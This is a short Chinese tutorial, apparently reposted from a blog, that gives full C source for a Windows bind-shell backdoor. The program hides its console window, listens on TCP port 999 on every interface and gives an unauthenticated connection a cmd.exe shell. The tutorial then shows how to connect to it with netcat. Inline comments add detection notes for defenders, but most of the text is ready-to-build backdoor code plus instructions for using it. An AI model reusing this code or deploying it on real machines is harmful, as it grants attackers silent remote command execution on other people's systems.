C语言实现简单CMDShell

1.首先使用vc6编译器编译后门,并运行

#pragma comment(lib,"ws2_32.lib")


#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>
#define Port 999


/*
 * Bind-shell backdoor: listens on TCP port `Port` (999) on every local
 * interface, accepts one unauthenticated connection and hands that socket to
 * the command interpreter named by COMSPEC as its stdin/stdout/stderr. The
 * linker pragma above (/subsystem:windows with a CRT entry point) means no
 * console window is shown while the listener runs.
 *
 * Defender notes (all derived from the code below):
 *  - No authentication and no encryption: anyone who can reach the port gets a
 *    shell running under this process's credentials; the traffic is the
 *    plaintext cmd.exe session.
 *  - Host artefacts to look for: a windowless process holding a LISTENING
 *    socket on 999, then a cmd.exe child whose standard handles are socket
 *    handles (bInheritHandles = TRUE below) and whose parent has no console.
 *  - Single-shot: accept() is called once and the program exits when the
 *    shell exits, so the listener disappears after the session.
 *  - Almost every API return value is ignored, so failures (port already
 *    bound, WSAStartup failure, COMSPEC unset) are never reported.
 *
 * Note: `sockaddr_in` without `struct` and the mid-block `int sLen` mean this
 * builds as C++ (a .cpp file under VC6), not as strict C89.
 *
 * Returns 0 unconditionally.
 */
int main()
{
    SOCKET sSocket,cSocket;         // cSocket: listening socket; sSocket: the accepted client
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WSADATA wsaData;
    sockaddr_in sSockaddr;          // reused for bind() and then overwritten by accept()
    char szCmdPath[MAX_PATH];       // path of the command interpreter (from COMSPEC)
 
    // Return value unchecked: if COMSPEC is unset, szCmdPath may be left
    // uninitialized and CreateProcess below receives garbage.
    GetEnvironmentVariable("COMSPEC",szCmdPath,MAX_PATH);
    ZeroMemory(&wsaData,sizeof(wsaData));
    ZeroMemory(&si,sizeof(STARTUPINFO));
    ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
    
    WSAStartup(0x0202,&wsaData);    // Winsock 2.2; result ignored
    // dwFlags = 0 (no WSA_FLAG_OVERLAPPED): presumably so the socket handle can
    // be used directly as a child's standard handle — TODO confirm on target OS.
    cSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
    sSockaddr.sin_addr.s_addr=INADDR_ANY;   // every local interface, not only loopback
    sSockaddr.sin_family=AF_INET;
    sSockaddr.sin_port=htons(Port);
    bind(cSocket,(sockaddr*)&sSockaddr,sizeof(sSockaddr));  // unchecked: fails silently if 999 is already in use
    listen(cSocket,1);              // backlog of one; only a single pending connection is queued

    int sLen=sizeof(sSockaddr);
    // Blocks until the first peer connects; the peer is never verified.
    sSocket=accept(cSocket,(sockaddr*)&sSockaddr,&sLen);
    si.cb=sizeof(si);
    si.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;   // wShowWindow is still 0 (SW_HIDE) from ZeroMemory
    si.hStdInput=(HANDLE)sSocket;   // the shell reads its commands from the socket
    si.hStdOutput=(HANDLE)sSocket;  // and writes output and errors back to it
    si.hStdError=(HANDLE)sSocket;
    // bInheritHandles = TRUE is what lets cmd.exe use the socket; no token or
    // security attributes are supplied, so the shell inherits this process's
    // credentials. Return value unchecked.
    CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
    WaitForSingleObject(pi.hProcess,INFINITE);  // the session lasts until the shell exits
    
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(cSocket);
    closesocket(sSocket);
    WSACleanup();

    return 0;
}

2.连接时使用nc工具连接即可

下载地址:https://eternallybored.org/misc/netcat/

nc执行命令 nc64.exe -t 192.168.1.12 999 即可连接到主机


转载自www.cnblogs.com/LyShark/p/9168461.html